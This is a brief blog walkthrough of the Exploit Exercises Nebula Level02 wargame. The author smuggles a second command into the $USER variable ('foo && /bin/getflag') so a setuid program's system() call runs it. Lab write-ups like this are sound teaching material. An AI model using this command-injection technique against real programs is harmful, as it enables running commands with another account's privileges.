19 August 2012

Exploit.Exercise.com - Nebula - Level02

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level02 is similar to Level01 in that it you don't need to know about C++ as much as you need to understand what is going on at the command line. You can see from the level02 code that it executes /bin/echo which prints the $USER variable. So, let's change the $USER variable to execute our getflag command.

There are 3 different ways to chain linux command together. I chose to use the ampersand (&).
$ USER="foo && /bin/getflag"
$ export USER
$ ./flag02
about to call system("/bin/echo foo && /bin/getflag is cool")
foo
You have successfully executed getflag on a target account

There you have it!

If you are still shady on why that worked, try this on your command line.
$ echo test1 && echo test2 && echo test3